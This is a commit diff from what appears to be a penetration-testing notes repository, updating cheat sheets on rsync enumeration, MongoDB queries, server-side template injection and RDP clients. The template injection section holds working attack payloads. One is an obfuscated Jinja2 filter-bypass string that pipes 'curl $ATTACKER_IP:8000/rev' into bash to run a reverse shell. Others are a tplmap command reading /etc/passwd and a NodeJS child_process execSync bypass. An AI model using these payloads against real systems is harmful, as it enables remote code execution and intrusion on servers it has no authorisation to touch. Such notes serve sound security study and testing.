whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

updates

This commit is contained in:
Stefan Etringer 2022-12-28 18:02:39 +01:00
parent ead8037331
commit a5b29def31
4 changed files with 38 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Enumeration/rsync.md
View File

@ -10,7 +10,9 @@ rsync <target-IP>::
rsync <target-IP>::files rsync <target-IP>::files
rsync <target-IP>::files/foo/ rsync <target-IP>::files/foo/
``` ```
### via netcat ### via netcat
* Another way is the following * Another way is the following
```sh ```sh
nc -vn $TARGET_IP 873 nc -vn $TARGET_IP 873
@ -30,6 +32,7 @@ nc -vn $TARGET_IP 873
rsync <user>@<target-IP>::/files/foo/bar.txt . rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo . rsync -r <user>@<target-IP>::/files/foo .
``` ```
Use no credentials at all to connect anonymously.
## Uploads ## Uploads

20
Exploits/Databases/MongoDB.md
View File

@ -1,8 +1,26 @@
# MongoDB # MongoDB
* The cli tool is `mongo` * The cli tool is `mongo`, there is also `mongo-sh` as an alternative
* [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/) * [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/)
## List Databases
```sh
show dbs
```
## List Collections
```sh
show collections
```
## List Content of a Collection
```sh
db.<collection>.find().pretty()
```
## List users ## List users
```sh ```sh

9
Exploits/Web/SSTI.md
View File

@ -2,6 +2,7 @@
Pass in parameters to control the template. Pass in parameters to control the template.
## Usage ## Usage
* Sanity test * Sanity test
```python ```python
{{2+2}} {{2+2}}
@ -23,6 +24,7 @@ Pass in parameters to control the template.
``` ```
## Identification of Template Engine ## Identification of Template Engine
Identify via payload checking Identify via payload checking
* Smarty: `a{*comment*}b` * Smarty: `a{*comment*}b`
* Mako: `${"z".join("ab")}` * Mako: `${"z".join("ab")}`
@ -33,6 +35,7 @@ Identify via payload checking
``` ```
## Tools ## Tools
### TPlmap ### TPlmap
```sh ```sh
git clone https://github.com/epinna/tplmap.git git clone https://github.com/epinna/tplmap.git
@ -50,6 +53,7 @@ tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
``` ```
### Countermeasure ### Countermeasure
* Remove everything in user input but alnum. Passing data, not data to f-string. * Remove everything in user input but alnum. Passing data, not data to f-string.
```python ```python
input = re.sub("[^A-Za-z0-9]", "", input) input = re.sub("[^A-Za-z0-9]", "", input)
@ -58,7 +62,12 @@ return render_template_string(template, input=input)
``` ```
## Bypass ## Bypass
* Save reverse shell as `rev` * Save reverse shell as `rev`
```sh ```sh
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}} {{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
``` ```
### NodeJS
If functions like require are blacklisted and are unusable, use [built-in objects](https://nodejs.org/api/globals.html) of NodeJS. Bypass by using `process` can be done instead, e.g. `process.mainModule.require('child_process').execSync('id');`.

7
Post Exploitation/Windows/Remote Desktop Protocol.md Normal file
View File

@ -0,0 +1,7 @@
# Remote Desktop Protocol RDP
## Tools to Connect
* `xfreerdp`
* `remmina`
* If nothing else is working use `rdesktop`